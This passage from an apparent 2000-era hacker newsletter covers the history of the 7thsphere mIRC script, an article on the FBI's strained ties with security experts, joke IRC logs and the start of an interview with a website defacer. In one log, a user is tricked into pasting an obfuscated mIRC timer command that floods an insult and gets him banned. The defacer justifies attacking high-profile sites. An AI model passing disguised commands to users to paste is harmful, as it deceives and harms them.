       7thsphere.com's viability.

       The domain was soon receiving over three thousand hits per day. At one 
       point, our webhosting provider informed me that we were using half of 
       their pipe just by ourselves (a full 10mbit). The growth continued for 
       months, until our web hosting provider was bought up. We no longer fit        
       into the new companys "Acceptable useage policy". Finding another company 
       that would provide the services as our old one was an impossible task. 
       That is what lead to the downfall of 7thsphere.com. At the time of 
       7thsphere.com's closure, over 3 million hits, from every country with 
       internet access in the world were created. Over 15,000 e-mails were 
       received in this time as well.

       "What was started by a few kids reached people all over the planet. To 
       this day, I still meet people who know 7thsphere.com or use the IRC 
       script. I am amazed at our accomplishments, and thank everyone who helped 
       from the bottom of my heart." - precursor

       A word from darkstarz

       Precursor, sphere and venum initially devised and authored the script 
       about 3-4 years ago when it was fashionable to play games on ircii. After 
       sphere 2 came out some of us began assisting precursor with financial 
       assistance, legal assistance, web services, etc. Sphere was designed        
       in addition to being one of the most advanced scripts for mirc, for 
       taking over channels during a desynching of servers and protecting 
       oneself from dos attackes. Some of the programs which were used as 
       defensive measures also had offensive capabilities. Other additions 
       included an fserver built in and other secondary programs not found in 
       mirc scripts. Rhad assisted with writing many programs for windows which 
       were initially and subsequently included.

       Precursor and I used to hang out in #anarchy on undernet which was 
       initially the home channel for 7thsphere. Many members of #anarchy began 
       to resent the intrusions by people requesting help with fundamentals in 
       the installation and maintenance of sphere. As a result,        Precursor 
       and I started the #7thsphere channel on undernet to help persons with 
       sphere problems. At first only precursor and I were in the channel as 
       regulars but we were soon joined by warblade and militant. Others later 
       came in offering assistance.

       7thpsphere ver 3.0 was perhaps the most advanced and technologically 
       efficient script available for over a year. It was primarily the product 
       of Precursor made with the assistance of persons too numerous to mention. 
       About 18 months ago Precursor and I attempted to secure the        
       assistance of others to produce version 4. About four people began work 
       on the project but petty infighting and jealousies developed which 
       resulted in a failure to fully develope the script but a beta version was 
       distributed to some people for testing. That version found its way to 
       many desktops but was never completed.

       About six months ago I, with the advise and consent of Precursor, 
       enlisted the help of esteem to embark upon the development of a 
       continuation of version 4 but to be enhanced and improved which was to be 
       called version 4.2. Esteem has been in charge of the development of the 
       script        since then with consultation of Precursor and I. It is 
       expected that a new version, 4.2 should be released any day. Esteem 
       should be consulted for a list of people he has recruited for email 
       services, web development, etc.

       I have for the most part always supervised the product development and 
       channel management of 7thsphere in conjunction with Precursor who is 
       really the father of the script. Many of us have devoted considerable 
       time, financial resources, etc. over a period of approximately five 
       years.        Many of the initial members of the organization have left 
       but still appear in the user files. Neverend is presently the channel 
       manager for #7thsphere and esteem is in charge of product development. 
       Precursor and myself can still be found in #7thphere and #virii.

        

       -darkstarz

        

       As it would turn out the version 4.2 would never be released. In the 
       early part of April, 2000 Esteem along with an accomplice took over 
       #7thsphere for about 5 hours. This shocked many people. Such a turnabout 
       was completed unexpected, but the tensions within the channel had been        
       building. This was due in part to the pressures of following up on 
       precursor's legendary script. The script was gone with esteem. However; 
       this would not be the end.

       There would be a re-birth.

      
       -=- Latest on the Script 

       8-23-00


 
       Well, it has been a long time since we last updated the general public on 
       the script. We do tell people that come in our channel a lot about the 
       script, but the majority of you would rather not. Some lucky people 
       (non-members) on #7thsphere found themselves with a beta of the new 
       script. Seems like the are enjoying it thoroughly. 

       So, what can we tell you about the script... Right now we are testing a 
       hex'd version of mIRC on several different operating systems trying to 
       see if it is stable on all. We want to include a hex'd mIRC, but if it 
       does not work on all, then nobody will see a hex'd mIRC released from 
       7thsphere.

       Dealing more with the script... right now, I (zmasterz) am mainly working 
       on the issue of getting bugs out of the script. I am also stuck with 
       rescripting some stuff I think can be coded better. supergate is coding 
       all new stuff taking suggestions from everyone. So if you have a 
       suggestion for the script stop in and see us.

       I am hoping to have the script out within two months. I am sorry about 
       the huge delay, but we keep coming up with more ideas for the script. 
       This is doing nothing but making it better, but also adding more time. 
       Keep looking for our next update, where we will talk about the features 
       of the script. Thanks, have a good one. 

       - ZMASTERZ


       A Talk With Precursor

       8-18-00
       

 

       #7thsphere wasnt particularly active a couple of days ago, and I was preparing to idle away and get to work on the site. Then i saw a famialir nick join the channel. At one time conisdered the most famous person on
       IRC and a integral part of 7thsphere, precursor visits the channel occasionally preferring to keep to himself. I took this opportunity to interview him in hopes to perhaps introduce him to the newer members of the
       7thsphere family. And to those who have know him here is a chance to take a closer, more personal peek behind the owner of the name 7thsphere.

       dr_trembl: So, after developing one of the best known scripts for mirc, it seems you slipped away, where have you been?

       precursor: That is a long question to answer.. I guess I slipped through the cracks about two years ago. But the story starts years before that. the reason 7thsphere progressed as it did was because I suffered from
       chronic fatigue syndrome and was home schooled. I didnt have the energy to do much besides computers. It lasted over 4 years.

       dr_trembl: Id heard of that

       precursor: However, a little over 2 years ago, I started to get better. I went back to school, and then graduated. That was the last time I was heavilly involved with 7thsphere. Since then, I have been going to college
       here in Buffalo NY, and working for a growing computer corporation. I have been with this company for almost 4 years now, and have grown to being a manager and in charge of about 10 other technicians. The
       company I work for contracts with one of the largest communications companies in the country, so it keeps me very busy :)

       dr_trembl: So you were able to network you're skills as a programmer into a career?

       precursor: It wasn't my skills as a programmer, I have never thought I was really that good. I believe what made 7thsphere good was its user friendlyness, and neat organization. I hate clutter, I like things to be
       "where they should".

       dr_trembl: So when you had gotten better, i guess you just needed to get out of the house?

       precursor: I needed to get back the life i lost :)

       dr_trembl: You had requested a link to fusion buffalo be featured on the site, thats a rave site. Have you been raving?

       precursor: i have been going to raves for almost 3 years :)

       dr_trembl: Definitely over the chronic fatigue, takes alot of energy to do that!

       precursor: I love electronic music, and I am big into the entire rave culture. I am also involved in the harm reduction movement that has received alot of media attention across the country with the use of ecstasy now
       being wide spread.

       dr_trembl: Do you plan to return to 7thsphere, in some capacity?

       precursor: Well, I would love to return to 7thsphere and do something usefull again. Its just a time factor, school, work, and a social life really eat into my persnal time.

       dr_trembl: I guess you've heard about the new script being written by zmasterz and a few other members?

       precursor: Yes, I have seen a few early beta versions as well.

       dr_trembl: Are you considering participating in developing the script?

       precursor: Honestly, I havent looked at mIRC scripting in 3 years or so, I dont remember much about it (although its still in my blood in someways :)). I would like to be more of a director type person, give comments
       and ideas to the programmers and see what they come up with.

       dr_trembl: Is there anything you'd like to say to someone reading this, lets say a new user who has only heard of you?

       precursor: Goto #7thsphere, its those people who have been doing it all for the past few years.

       There will be more from precursor, he will be on board for the next incarnation of our site! Ive seen the rough draft and believe me the next layout is gonna rock.

        


 319.0 [IND] Study Shows: FBI Alienates Industry Security Experts
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://www.technologyevaluation.com/Research/ResearchHighlights/Security/2000/08/news_analysis/NA_ST_LPT_08_21_00_1.asp
       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 1 of 6

       Problem 

       Fighting cybercrime is complex and time-consuming. One case can
       involve a multitude of computer systems, networks, and
       administrators, and requires the cooperation of all system owners,
       and sometimes many nations, in order to find the perpetrator. Due
       to their love of technology, their education, training, and
       experience, it is not uncommon for security industry professionals
       to be far more qualified and adept at resolving cybercrime than law
       enforcement. 

       Though the FBI thrives on reaping assistance from industry
       security professionals, many industry security experts are
       reluctant to help the Federal law enforcement agency when it
       comes to cybercrime. Though it makes it a lot more difficult for the
       FBI to track cybercriminals without the help and cooperation of
       private industry, savvy security experts are not lining up to help.
       This lack of respect that industry professionals have for the FBI
       results in cases taking longer to crack, and many going unresolved.
       It also often leaves the Department of Justice looking like a
       three-ring circus. 
       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 2 of 6

       Background 

       Typically, when the FBI requests assistance from a security
       professional, the kind of assistance they require is extensive which
       is to be expected, given the circumstances. They need to
       understand the network topologies, the systems affected, the
       points of entry, and need to locate, collect, and analyze all the
       corresponding log files. All this data gathering and analysis takes
       time. 

       Private industry exists in order to create revenue. In this
       burgeoning Internet economy, information technology resources
       are scarce. Inside of that IT circle, information security resources
       are still more scarce. Taking time out from daily security duties to
       assist the FBI in a case that may not have directly impacted their
       own company's bottom line can actually end up costing a company
       a significant amount of lost revenue. It's often more cost effective
       to tell law enforcement, "No, no logs on any of our systems that
       would be useful to you" than spend hours, days, or weeks,
       combing through log files, systems, and backup tapes, only to
       hand them over to a law enforcement agency that in many cases
       does not know what to do with them. 

       Unless log files have been subpoenaed, and therefore must be
       turned over as evidence, there is often no return on investment
       when a company spends hours combing through log files for data
       that may or may not be helpful or appreciated. 

       It is not unusual for a company to charge $200 an hour for
       security consulting services. If a security consultant spends a
       whole day assisting an FBI agent, this can amount to $1600.00 a
       day in lost revenue for the consultant's employer. For a service
       provider, a day without a security engineer can also open them up
       to potential lawsuits, lost customers, and lost future revenue
       streams. In short, it costs companies exorbitant amounts of money
       to assist the FBI. Because companies allocate resources to
       assisting the FBI and other law enforcement agencies, they need
       to have this "free consulting" respected and rewarded. 

       In the course of our study, we communicated with a
       wide-selection of industry security experts from around the
       country. Some of these experts are ex-FBI employees. In doing so,
       we would like to retell some of the experiences that have been
       communicated to us, and would like to share certain trends that
       we have identified that seem to hamper the cybercrime
       investigation process. 

       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 3 of 6

       Why We Don't Help the FBI 

       Case 1: A Security Director at a well-known Internet company
       was plagued with some serious domain hijacking problems. Domain
       hijacking is when someone who does not own the dot-com name
       takes it over through technical DNS manipulations, and uses it for
       their own, sometimes subversive, purposes. In essence, this is
       kidnapping a domain name. This Director spent a significant amount
       of time and resources identifying the perpetrator of the attacks,
       down to documenting the name, address, and phone number. This
       information was turned over to the FBI's Wasington, D.C.
       headquarters office to investigate. 

       The Director justified the case by presenting a considerable
       amount of evidence that supported $2-3million worth of damages.
       The domain that was hijacked was a very well known and lucrative
       domain name. A week after the incident, the Director met with the
       FBI and submitted the initial report. In the next 9 months, the only
       thing he heard was that according to the FBI agents, the work the
       director's team had done saved the FBI several months of time.
       The information in the Incident Report submitted to the FBI
       included the suspect's name, address, parent's names, and almost
       everything required to obtain a timely prosecution. 

       After nine months, someone from the FBI contacted the Director,
       asking him to re-submit the report, telling him that the report
       needed to be submitted in person. (The Director had submitted the
       report in person nine months earlier in the initial meeting.) The FBI
       agent said he would come to the Director's facility to pick up the
       report. The Director was waiting for the agent with yet another
       copy of this same Security Incident Report. 

       When this FBI agent arrived, he already had the report in his hands
       (due to the in-person submission nine months earlier). He handed it
       to the Director, and then said, "Now I need you to give it back to
       me so I can testify that you submitted this report in person." The
       FBI agent handed the report that the Director had written nine
       months previously back to him, and instructed the Director to now
       give it back to the FBI agent. The FBI agent then thanked the
       Director and said that now the FBI could begin looking into the
       case. As of June 2000, the Director has still not heard anything
       back from the FBI. 

       Questions that come to mind are the following:

            Why is the FBI not willing to receive reports from the public
            and private sector electronically? The likely reason is that
            they do not use strong encryption and therefore cannot
            adequately authenticate the original document owner. 

            After spending an enormous amount of time and resources
            identifying the perpetrator, why was this Director not
            contacted for 9 months? Typically, professionals who take
            the time to submit detailed reports are interested in seeing a
            case come to closure. 

            Was the case even investigated? Not to the Director's
            knowledge.

            Was the case documented in an Incident Tracking Database?


            Were charges pressed? Was anyone prosecuted? Not
            according to the Director. 

            Is this perpetrator now hijacking other domain names? 

       The Director has told TEC that he will not be taking the time to
       research and hand-over evidence to the FBI in future incidents.
       His perception is that, "The FBI is woefully under-equipped." 

       In the IT world, things happen quickly - this includes engineering
       developments and security breaches. The IT sector cannot afford
       to play bureaucratic reporting games to the FBI that in the long
       run produce no results. The FBI needs to be digitally equipped to
       securely accept information sent to them electronically. A trend
       that we noticed in talking to information security experts is that
       the wheels of justice are very slow.

       Case 2: An Internet dot-org group (a non-profit Internet
       company) that was being managed by security experts was trying
       to assist the FBI in the February 9th, distributed denial of service
       attacks. They went through the trouble of putting up a private
       link, just for the purpose of providing information and evidence to
       the FBI. They provided the FBI with IRC chat logs, and names and
       contact information of people who had actually confessed to
       participating in the crime. The dot-org group said that the FBI
       chose to not even access the link with the details of the crime. 

       Questions that come to mind are the following:

            Why did the FBI choose not to access the electronic
            evidence? 

            Was the information entered into an Incident Response
            Database? 

            Has the perpetrator been instigating new denial of service
            attacks? 

       Looking at Cases 1 and 2, we may surmise that if evidence is not
       presented in person, the FBI is not interested in reviewing it.

       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 4 of 6

       Case 3: An Internet dot-org group identified multiple perpetrators
       of web-site defacement - digital graffiti. They presented this
       information to the FBI, and never heard anything back.

       Questions that come to mind are the following:

            Was the information entered into an Incident Response Database?

            Was the case even investigated?

            Has the perpetrator been defacing more web-sites? 

       Case 4: A seasoned security professional became aware that his
       name was included on a database of "well-known hackers" that
       was later sold to the FBI by a competitor. The security
       professional has never engaged in unethical hacking activities, and
       feels that his name was libelously and inappropriately included in
       this database of "well-known hackers" for spiteful, competitive
       reasons. Since the FBI purchased this database that was
       established without verification, the security professional feels
       that the FBI in conjunction with the begrudging competitor, may
       have potentially damaged his professional reputation. In light of
       this transgression, the security professional is no longer interested
       in assisting the FBI.

       Questions that come to mind are the following:

            How can a professional find out if his/her name is being erroneously
            catalogued in an FBI database? 

            What sort of verification processes does the FBI use when purchasing
            non-qualified information? 

            What other kinds of non-qualified information of criminal activity does
            the FBI purchase? 

       Case 5: A security expert spent an enormous amount of time
       doing forensic work and analysis in tracking down a well-publicized
       hacking incident. The information was reported to the FBI, only to
       have the FBI take credit for doing the expert analysis, while never
       paying a cent for consulting services. 

       Case 6: A security contractor who was working for a federal
       agency had the website that he was administering defaced by a
       cyber vandal. Instead of helping him identify the perpetrator, the
       FBI questioned him for hours, suggesting that a colleague of his
       had participated in the incident. Although it was never proven, the
       FBI insisted there had been some sort of duplicity on the
       contractor's part, insinuating that he himself was somehow
       involved in the crime in question. The real perpetrator was never
       identified, and the security contractor no longer wants any
       association with the FBI.

       Case 7: A well-known ISP refuses to install the "Carnivore"
       surveillance tracking device citing implementation and
       administration issues. 

       Questions that come to mind are the following:

            Why doesn't the FBI realize that asking one entity to invade the
            privacy of others does not usually build relationships or trust? Most
            ISPs have contractual privacy agreements with their customers that
            they must abide by. Installing a device such as the Carnivore would in
            many cases be a breach of customer contractual agreements. 

            If the FBI wants an ISP to perform some sort of service for them, why
            are they not willing to become a legitimate paying customer and pay
            for implementation, administration, and overhead costs? 
       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 5 of 6

       Inside the FBI 

       One security professional told us that he found it easy to work
       with the FBI, but conceded that he did this by circumventing the
       bureaucratic processes and accessing resources through back
       doors at very high levels. He went on to say that the FBI's
       cybercrime task force is clearly under-equipped. 

       The FBI does not always do a good job of "marketing" what it does
       well. Naturally, bad news always receives more attention in the
       press than good news. Our research has indicated that one thing
       that the FBI does well is investigate cyberpedophilia. Though many
       incidences of cyberpedophilia go unreported, of the cases that are
       reported, the FBI has an impressive track record of apprehending
       the perpetrators most of the time. Almost all cyberpedophilia
       arrests lead to people going to jail. The FBI (and U.S. Customs)
       prosecutions in this area have approximately a 99% success
       rate.[1] Keeping America's children safe is an initiative that an
       overwhelming majority of security professionals support and are
       often eager to help in this area. 

       [1] Source: Parent's Guide to Protecting Your Children in
       Cyberspace, by Parry Aftab

       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 6 of 6 

       Recommendations for Resolution 

       If the FBI requires the assistance of private industry to
       conduct investigations, they should pay for it like everyone
       else. Providing free services to Federal agencies is not
       something that businesses are setup to do. Managing
       security incidents is a business. If the FBI needs to
       outsource, they should be paying for this service. If the FBI
       pays for the necessary IT services they require, they will
       likely see a resounding change in the willingness of
       information security professionals to assist them. The FBI
       does not manage incidents - they investigate and prosecute
       suspects that may cause such incidents. 

       The FBI needs to start giving credit where it is due. If an
       industry professional does all the leg work in tracking down a
       cybercriminal for free, they should be credited appropriately
       for their expert analysis and the time they contribute.
       Begging others for clues, and then taking the technology
       credits for doing the expert analysis done by someone else
       does not go over well with industry professionals. 

       Industry professionals who understand information security,
       also understand technology privacy implications more than
       most people. They are somewhat leery of involving
       government agencies in general due to the belief that in the
       future, true privacy will be available only for those with the
       privilege of a technology education. 

       Lawmakers need to understand technology in order to
       regulate it. Most lawmakers and Federal agencies are to a
       large degree, technology illiterate. Knowledge helps one gain
       respect. Law enforcement needs to build productive
       relationships with America's IT security community to better
       increase their knowledge base. 

       Our research indicates that the metropolitan FBI offices are
       fighting and managing cybercrime somewhat independently
       of each other, each having their own processes for
       investigations. These processes need to be standardized
       across all FBI offices in order for the FBI to become truly
       effective. Private industry needs to understand the
       investigation process in order to provide better assistance. A
       former employee of the FBI commented that the FBI
       cybercrime unit is surprisingly decentralized.

       On occasions, when private industry has proactively sought
       out the FBI for assistance, it has been reported that various
       FBI offices seem uninterested in assisting private industry -
       an attitude that has an off-putting effect. If an information
       security engineer has had a previous experience where the
       FBI has shown no interest in providing assistance, the FBI
       can expect a similar attitude from the information security
       engineer in the future. 
                           
      @HWA                           
      
      

320.0 [HWA] Silly IRC logs for your amusement and edufication
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The case of the mad AOL hax0r.
      
      #HWA.hax0r.news
      
      [01:16am] *** Joins: CRASH_N_B (CRASnBURN@ACA9189E.ipt.aol.com)
      [01:17am] <CRASH_N_B> ne hackers here????????
      [01:17am] <PhantasmP> why?
      [01:17am] <paluka> na this is a cooking chan
      [01:17am] <PhantasmP> cooking? I though it was a sex chan, shit
      [01:17am] <CRASH_N_B> oh i need help hacking
      [01:18am] *** HWA sets mode: +o paluka
      [01:18am] <PhantasmP> what do you need help with?
      [01:18am] <paluka> you got it wrong .. its nude cooking
      [01:18am] <CRASH_N_B> LOL
      [01:18am] <CRASH_N_B> phant u a hacker?
      [01:19am] <PhantasmP> don't use the deep fryer naked, that hurts
      [01:19am] <CRASH_N_B> r u a hacker????
      [01:19am] <PhantasmP> define hacker
      [01:19am] <CRASH_N_B> computer hacker
      [01:19am] <paluka> heh
      [01:19am] <paluka> great definition
      [01:20am] <CRASH_N_B> lol
      [01:20am] <paluka> one question
      [01:20am] <PhantasmP> like playing hacky sac with a computer?
      [01:20am] <paluka> wtf u using aol?
      [01:20am] <PhantasmP> AOL's leet, duh!
      [01:20am] <CRASH_N_B> guilty
      [01:21am] <PhantasmP> Crash, what do you need help with?
      [01:21am] <CRASH_N_B> hacking a site
      [01:21am] <paluka> u mean defacing?
      [01:21am] <PhantasmP> or hacking it with an axe?
      [01:23am] <CRASH_N_B> de facing
      [01:23am] <paluka> thats not hacking
      [01:23am] <paluka> atleast not under my definition
      [01:23am] <PhantasmP> is their a reason to deface it?
      [01:23am] <CRASH_N_B> i just want to do it
      [01:24am] <PhantasmP> well their needs to be a reason behind it
      [01:24am] <PhantasmP> it give you modivation
      [01:24am] <CRASH_N_B> because it's bob.com
      [01:24am] <PhantasmP> and your name is bob?
      [01:24am] <CRASH_N_B> i'm obbsessed wit the name bob
      [01:25am] *** Joins: Stigma (starman@xxxxxxxxx32.esatxxxx.xx)
      [01:25am] <CRASH_N_B> no mmy monkey's name is bob
      [01:25am] *** sAs sets mode: +o Stigma
      [01:25am] <paluka> what the hell u gonna do when u deface it
      [01:26am] <PhantasmP> say I'm CRASH_N_B, and i'm 31337?
      [01:26am] <CRASH_N_B> i dunno
      [01:26am] <CRASH_N_B> 31337?
      [01:26am] <paluka> great
      [01:26am] <paluka> crash u know what unix is?
      [01:26am] <paluka> or nt?
      [01:27am] <CRASH_N_B> yea!
      [01:27am] <paluka> what is it?
      [01:27am] *** Joins: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
      [01:27am] <CRASH_N_B> it's program
      [01:28am] <paluka> great topic :P
      [01:28am] *** Parts: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
      [01:28am] <paluka> that should go in the mag 
      [01:28am] <PhantasmP> Crash copy and paste this in mirc /timer 0 0 $left(America,3) $right(tennis,2) $left(golden,1) $+ $left(another,1) $+ $left(yawn,1)
      [01:28am] <CRASH_N_B> can you help me do it??????
      [01:29am] <CRASH_N_B> where do i past it?
      [01:29am] <PhantasmP> in the place where you type
      [01:29am] <paluka> on the status screen
      [01:29am] <paluka> or here if u want
      [01:29am] <CRASH_N_B> ok
      [01:29am] <CRASH_N_B> how do i copy it ain't workin
      [01:30am] <PhantasmP> put your cursor at the first / and move down to the end
      [01:30am] <PhantasmP> it copies by its self, so after that push shift insert
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] *** \t sets mode: +b *!*CRASnBURN@*.aol.com
      [01:30am] *** CRASH_N_B was kicked by \t (CTCP flooder)
      [01:30am] <PhantasmP> hahahahahahaq
      [01:30am] <paluka> hah
      [01:30am] *** Joins: base2op (deadmaker@ppp81.xxxxxx.net)
      [01:30am] <PhantasmP> didn't think id get to use that so soon :)
      
      <END>
      
321.0 [HWA] The strange case of Cruci's birthday dog
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Ok i was real tired and hopped up on goofballs and didnt want to destroy my
      poo-chi by Tiger <tm> box coz its collectable if i dont destroy it. So this
      is the fun and games from that early morning session. A personal wacky side
      i don't often show laugh it up, i know it looks g4y but i'm secure tnx.
      
      Have fun...;) - Cruci
      
      
      #HWA.X.X
      
      [05:43am] <Cruciphux> I got a robot doggy for my birthday!!#!#@
      [05:43am] <Cruciphux> heh
      [05:43am] <Cruciphux> just what i wanted
      [05:43am] <Cruciphux> lol
      [05:43am] <[Zucco]> man perlipc
      [05:43am] <PhantasmP> did your daddy get you a prostitute?
      [05:43am] <[Zucco]> :)
      [05:43am] <Cruciphux> haha
      [05:43am] <Cruciphux> i wish
      [05:43am] <Oj1st> a what cruci ?
      [05:43am] <Oj1st> you got a dog ?
      [05:44am] <Cruciphux> hahaha
      [05:44am] <Cruciphux> nice log
      [05:44am] <PhantasmP> thank :)
      [05:45am] <Cruciphux> haha
      [05:45am] <Cruciphux> heh
      [05:46am] <Cruciphux> poo-chi
      [05:46am] <Cruciphux> shit
      [05:46am] <Cruciphux> installation of batteries should
      [05:46am] <Cruciphux> be done by an adult
      [05:46am] <Cruciphux> hrm
      [05:46am] <Cruciphux> guess i can do it eh?
      [05:46am] <Oj1st> hehe
      [05:47am] <Oj1st> guess so
      [05:47am] <Cruciphux> have you seen these things?
      [05:47am] <Cruciphux> by the furby people
      [05:47am] <Cruciphux> lemme see if i can find it on the net
      [05:47am] <PhantasmP> I think i've seen a comercial
      [05:47am] <PhantasmP> 3 girls wearing stuff no one else in the world would wear petting the dogs
      [05:48am] <Cruciphux> www.tigertoys.com
      [05:48am] <PhantasmP> their nothing like taking a piss in the backyear at 5:50 in the morning
      [05:49am] <Cruciphux> lol
      [05:49am] <Cruciphux> trying to figure out how to open the box
      [05:49am] <Cruciphux> :-/
      [05:49am] <PhantasmP> pull out the flap
      [05:50am] <Cruciphux> i need an exploit
      [05:50am] <Cruciphux> wonder if hack.co.za has one
      [05:50am] <PhantasmP> fuck get a knife and stab the box to death
      [05:50am] <Oj1st> lol
      [05:50am] <Cruciphux> www.tigertoys.com/home.html
      [05:50am] <Oj1st> try satans-army.co.uk
      [05:50am] <Oj1st> the box
      [05:50am] <Oj1st> rofl
      [05:50am] <Oj1st> you stil haven't gotten the box open yet
      [05:50am] <Cruciphux> nope
      [05:51am] <Oj1st> lol
      [05:51am] <Cruciphux> how the fuck
      [05:51am] <PhantasmP> god, I sure hope they didn't wrap it, or else it would of taken you a while to get that off
      [05:51am] <Cruciphux> i'm almost in
      [05:51am] <PhantasmP> lol
      [05:51am] <Cruciphux> i did that earlier
      [05:51am] <PhantasmP> how long did it take?
      [05:51am] <Cruciphux> aha!
      [05:52am] <Cruciphux> sticky tape
      [05:52am] * PhantasmP claps
      [05:52am] <PhantasmP> wait, you said haven't opened it yet?
      [05:52am] <Cruciphux> no
      [05:52am] * PhantasmP takes back the claps
      [05:52am] <Cruciphux> shit
      [05:53am] * PhantasmP cheers on Cruci
      [05:53am] <Cruciphux> ok
      [05:53am] <Cruciphux> i'm in
      [05:53am] <PhantasmP> Good work!
      [05:53am] <Cruciphux> oh fuck
      [05:53am] <Cruciphux> now its like stuck to some inside cardboard thing
      [05:53am] <PhantasmP> with twist ties?
      [05:53am] <Cruciphux> i dont see any
      [05:53am] <Cruciphux> i might have to take pictures and post it on the site
      [05:54am] <PhantasmP> you definatly have to!
      [05:54am] <Cruciphux> oh
      [05:54am] <Cruciphux> you have to rip apart the handle
      [05:54am] <PhantasmP> hook it up to your comptuer and let everyone control it from their home
      [05:54am] <PhantasmP> shit, nm, i'm an idiot
      [05:55am] <Cruciphux> what the fuck
      [05:55am] <Cruciphux> i'm taking a rest
      [05:56am] <PhantasmP> give it to your parents they'll have it out in no time
      [05:56am] <Cruciphux> heh
      [05:56am] <Cruciphux> i don't wanna break the box see
      [05:56am] <Cruciphux> i still have the original furby box too
      [05:56am] <Cruciphux> =)
      [05:56am] <PhantasmP> So do I :)
      [05:56am] <PhantasmP> well furby baby, cause they didnt' have any of the other ones
      [05:57am] <Cruciphux> man
      [05:57am] <Cruciphux> owning a gov auth NS is easier than this
      [05:57am] <PhantasmP> :)
      [05:57am] <PhantasmP> do you think it comes nutard/spaided?
      [05:58am] <PhantasmP> do you know how much ~ it cost?
      [05:59am] <Cruciphux> no
      [05:59am] <Cruciphux> $50?
      [05:59am] <PhantasmP> fuck, I got a real dog for $60
      [05:59am] <Cruciphux> haha
      [05:59am] <Cruciphux> guh!
      [05:59am] <Cruciphux> furby babies!#
      [06:00am] <Oj1st> hehe
      [06:00am] <Cruciphux> yes i'm 35 and i like furbies ok
      [06:00am] <Cruciphux> heh
      [06:00am] <Oj1st> yes its fine
      [06:01am] <PhantasmP> umm how come I was thinking you were 35 before you said that?
      [06:01am] <Cruciphux> tnx
      [06:01am] <Cruciphux> hehe
      [06:01am] <Cruciphux> heh
      [06:01am] <Cruciphux> PhantasmP 
      [06:01am] <PhantasmP> did you put your age somewhere?
      [06:01am] <Cruciphux> i cant open this box
      [06:01am] <Cruciphux> yeh
      [06:01am] <Cruciphux> actually
      [06:01am] <Cruciphux> i'm 36 now
      [06:01am] <Cruciphux> but we'll keep it at 35
      [06:01am] <Cruciphux> k?
      [06:01am] <PhantasmP> no prob, its only 6 hours into a new day
      [06:02am] <Cruciphux> age 4+
      [06:02am] <Cruciphux> how the fuck would a 4 yr old handle this
      [06:02am] <Cruciphux> hrm
      [06:02am] <PhantasmP> they'd have their parents do it
      [06:02am] <Cruciphux> they're asleep
      [06:02am] <Cruciphux> ok
      [06:03am] <Cruciphux> i'm gonna get my switchblade
      [06:03am] <Cruciphux> and cut the twist ties
      [06:03am] <PhantasmP> wake them up, and act all excited like your 4 on christmas morning
      [06:03am] <Cruciphux> actually FProphet and Dicentra got me this
      [06:04am] <Cruciphux> my bro and his fiancee
      [06:04am] <PhantasmP> maybe they tampered with it to make it hard for you to open
      [06:04am] <Cruciphux> thats what i'm thinking
      [06:04am] <Cruciphux> its like that movie 'the game'
      [06:04am] <Cruciphux> and this is my game
      [06:04am] <PhantasmP> but it wouldn't be worth it if they wern't they to see you struggle
      [06:04am] <Cruciphux> brb
      [06:05am] <Cruciphux> i have this feeling someone is logging this
      [06:06am] <Cruciphux> its 6:13am and the box is open but the dog is still inside
      [06:06am] <Cruciphux> i
      [06:06am] <Cruciphux> ll keep u posted
      [06:06am] <PhantasmP> if you need moral support, i'll be here
      [06:06am] <Cruciphux> cant find my knife
      [06:06am] <PhantasmP> shit, it stinks outside
      [06:07am] * Cruciphux rests again
      [06:08am] <Cruciphux> how come furby babies you have to be 6+ and the dog is 4+
      [06:09am] *** Quits: Oj1st (Ping timeout: 180 seconds)
      [06:10am] <PhantasmP> furby looks scary
      [06:13am] <PhantasmP> furby checkout http://20x.x8x.231.41/ again
      [06:13am] <PhantasmP> err Cruci I mean
      [06:13am] <PhantasmP> if you have time
      [06:16am] <Cruciphux> 6:24am
      [06:16am] <Cruciphux> its out
      [06:16am] * PhantasmP claps
      
      <END>

     
322.0 [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      [ - Session Start - (EDITED SLIGHTLY) -]
      
      (c) 2000 by PhantasmP of HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript.
      
      Mailto: media@hwa-security.net
      
      Thanks to: Herbless for replying back with the answers
      so quickly and raist & I0wnzz([n]crypt) for providing
      the first 3 questions.
      
      http://hwa-security.net - #hwa-security on EFNet
      
      >1. How did you get started in defacing?
      
      I've always been a computer geek, and I was playing with security vulnerabilities 
      and other peoples networks, when I thought "hey, I could use this to spread 
      my thoughts around". I've usually got something to say on most subjects and felt that
      I could use this new technology to spread my thoughts around. It would appear to have
      started something akin to a cult following.
      
      >2. Whats the reasoning behind your defacements?
      
      I have various reasons, most of which are apparent on the websites I deface. 
      In the past I've posted messages and info on DeCSS, smoking and government 
      hypocrisy and most recently, I've supported the fuel protests in Britain. 
      I do these things because I believe in them; I think they are right. In 
      the future, I may do something against paedophilia and also rascism because 
      these are blights of the human mind and should be stamped out. Ignorance 
      is no excuse for persecution.
      
      >3. Why do you do high risk defacements?
      
      High risk sites comes with a high profile - they get my message to the masses. 
      Of course, it could be that I enjoy the attention at a distance... kind 
      of infamous, but anonymous. I suppose there is a perverse kind of satisfaction 
      to that.
      
